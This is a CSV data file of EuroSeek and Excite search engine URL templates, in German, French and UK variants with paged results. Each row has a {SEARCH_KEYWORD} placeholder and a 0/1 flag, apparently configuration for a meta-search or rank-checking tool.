"International","EuroSeek DE 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_de","1"
"International","EuroSeek DE 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_de","0"
"International","EuroSeek DE 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_de","0"
"International","EuroSeek DE 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_de","0"
"International","EuroSeek DE 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_de","0"
"International","EuroSeek DE 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_de","0"
"International","EuroSeek FR","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_fr","1"
"International","EuroSeek FR","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_fr","0"
"International","EuroSeek FR","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_fr","0"
"International","EuroSeek FR","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_fr","0"
"International","EuroSeek FR","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_fr","0"
"International","EuroSeek FR","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_fr","1"
"International","EuroSeek FR 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_fr","1"
"International","EuroSeek FR 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_fr","0"
"International","EuroSeek FR 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_fr","0"
"International","EuroSeek FR 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_fr","0"
"International","EuroSeek FR 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_fr","0"
"International","EuroSeek FR 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_fr","1"
"International","EuroSeek FR 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_fr","1"
"International","EuroSeek FR 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_fr","0"
"International","EuroSeek FR 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_fr","0"
"International","EuroSeek FR 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_fr","0"
"International","EuroSeek FR 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_fr","0"
"International","EuroSeek FR 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_fr","0"
"International","EuroSeek FR 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_fr","1"
"International","EuroSeek FR 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_fr","0"
"International","EuroSeek FR 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_fr","0"
"International","EuroSeek FR 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_fr","0"
"International","EuroSeek FR 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_fr","0"
"International","EuroSeek FR 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_fr","0"
"International","EuroSeek FR 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_fr","1"
"International","EuroSeek FR 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_fr","0"
"International","EuroSeek FR 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_fr","0"
"International","EuroSeek FR 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_fr","0"
"International","EuroSeek FR 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_fr","0"
"International","EuroSeek FR 5 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_fr&string={SEARCH_KEYWORD}&start=40&page=5&lang=lang_fr","0"
"International","Excite","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&ran=7834&qkw={SEARCH_KEYWORD}&method=0&dpcollation=1&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qk=30&rpe=30&timeout=0&start=&ver=10142","1"
"International","Excite","http://msxml.excite.com/info.xcite/search/web/{SEARCH_KEYWORD}","0"
"International","Excite","http://msxml.excite.com/info.xcite/search/web/{SEARCH_KEYWORD}","0"
"International","Excite","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&ran=7834&qkw={SEARCH_KEYWORD}&method=0&dpcollation=1&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qk=30&rpe=30&timeout=0&start=&ver=10142","0"
"International","Excite","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&ran=7834&qkw={SEARCH_KEYWORD}&method=0&dpcollation=1&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qk=30&rpe=30&timeout=0&start=&ver=10142","0"
"International","Excite","http://msxml.excite.com/info.xcite/search/web/{SEARCH_KEYWORD}","0"
"International","Excite 2 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=31&top=2&start=&ver=3719","1"
"International","Excite 2 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=31&top=2&start=&ver=3719","0"
"International","Excite 2 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=31&top=2&start=&ver=3719","0"
"International","Excite 3 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=61&top=3&start=&ver=15614","1"
"International","Excite 3 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=61&top=3&start=&ver=15614","0"
"International","Excite 3 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=61&top=3&start=&ver=15614","0"
"International","Excite 4 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=91&top=4&start=&ver=10778","1"
"International","Excite 4 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=91&top=4&start=&ver=10778","1"
"International","Excite 4 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=91&top=4&start=&ver=10778","0"
"International","Excite 5 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=121&top=5&start=&ver=27893","1"
"International","Excite 5 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=121&top=5&start=&ver=27893","0"
"International","Excite 5 (Next 30)","http://msxml.excite.com/_1_CK2UFM03I27VHU__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail20.sef.inspinc.ad:1057560226981:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&qi=121&top=5&start=&ver=27893","0"
"International","Excite DE","http://search-dyn.excite.de/search.php?language=de&external=1&offset=0&key={SEARCH_KEYWORD}","1"
"International","Excite DE","http://search-dyn.excite.de/search.php?language=de&external=1&offset=0&key={SEARCH_KEYWORD}","0"
"International","Excite DE","http://search-dyn.excite.de/search.php?language=de&external=1&offset=0&key={SEARCH_KEYWORD}","0"
"International","Excite DE","http://search-dyn.excite.de/search.php?language=de&external=1&offset=0&key={SEARCH_KEYWORD}","1"
"International","Excite DE","http://search-dyn.excite.de/search.php?language=de&external=1&offset=0&key={SEARCH_KEYWORD}","0"
"International","Excite DE","http://search-dyn.excite.de/search.php?language=de&external=1&offset=0&key={SEARCH_KEYWORD}","0"
"International","Excite DE 2 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","1"
"International","Excite DE 2 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 2 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 2 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 2 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 2 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 3 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","1"
"International","Excite DE 3 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 3 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 3 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 3 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","1"
"International","Excite DE 3 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 4 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","1"
"International","Excite DE 4 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 4 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 4 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","1"
"International","Excite DE 4 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 4 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 5 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","1"
"International","Excite DE 5 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 5 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 5 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 5 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite DE 5 (Next 10)","http://search-dyn.excite.de/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=&language=de&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR","http://search-dyn.excite.fr/search.php?key={SEARCH_KEYWORD}&external=1&language=fr&collection=web","1"
"International","Excite FR","http://search-dyn.excite.fr/search.php?key={SEARCH_KEYWORD}&external=1&language=fr&collection=web","0"
"International","Excite FR","http://search-dyn.excite.fr/search.php?key={SEARCH_KEYWORD}&external=1&language=fr&collection=web","0"
"International","Excite FR","http://search-dyn.excite.fr/search.php?key={SEARCH_KEYWORD}&external=1&language=fr&collection=web","0"
"International","Excite FR","http://search-dyn.excite.fr/search.php?key={SEARCH_KEYWORD}&external=1&language=fr&collection=web","0"
"International","Excite FR","http://search-dyn.excite.fr/search.php?key={SEARCH_KEYWORD}&external=1&language=fr&collection=web","0"
"International","Excite FR 2 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","1"
"International","Excite FR 2 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 2 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 2 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 2 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 2 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=10&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 3 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","1"
"International","Excite FR 3 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 3 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 3 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 3 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 3 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=20&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 4 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","1"
"International","Excite FR 4 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 4 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 4 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 4 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 4 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=30&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 5 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","1"
"International","Excite FR 5 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 5 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 5 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 5 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite FR 5 (Next 10)","http://search-dyn.excite.fr/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=fr&offset=40&nosplash=0&ovr=0&xargs=0&ppargs=","0"
"International","Excite UK","http://search-dyn.excite.co.uk/search.php?key={SEARCH_KEYWORD}&external=1&collection=web","1"
"International","Excite UK","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&c=web","0"
"International","Excite UK","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&c=web","0"
"International","Excite UK","http://search-dyn.excite.co.uk/search.php?key={SEARCH_KEYWORD}&external=1&collection=web","0"
"International","Excite UK","http://search-dyn.excite.co.uk/search.php?key={SEARCH_KEYWORD}&external=1&collection=web","0"
"International","Excite UK","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&c=web","0"
"International","Excite UK 2 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=9&nosplash=0&ovr=1&xargs=0&ppargs=","1"
"International","Excite UK 2 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=10","0"
"International","Excite UK 2 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=10","0"
"International","Excite UK 2 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=9&nosplash=0&ovr=1&xargs=0&ppargs=","0"
"International","Excite UK 2 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=9&nosplash=0&ovr=1&xargs=0&ppargs=","0"
"International","Excite UK 2 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=10","0"
"International","Excite UK 3 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=19&nosplash=0&ovr=1&xargs=0&ppargs=","1"
"International","Excite UK 3 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=20","0"
"International","Excite UK 3 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=20","0"
"International","Excite UK 3 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=19&nosplash=0&ovr=1&xargs=0&ppargs=","0"
"International","Excite UK 3 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=19&nosplash=0&ovr=1&xargs=0&ppargs=","0"
"International","Excite UK 3 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=20","0"
"International","Excite UK 4 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=29&nosplash=0&ovr=1&xargs=0&ppargs=","1"
"International","Excite UK 4 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=30","0"
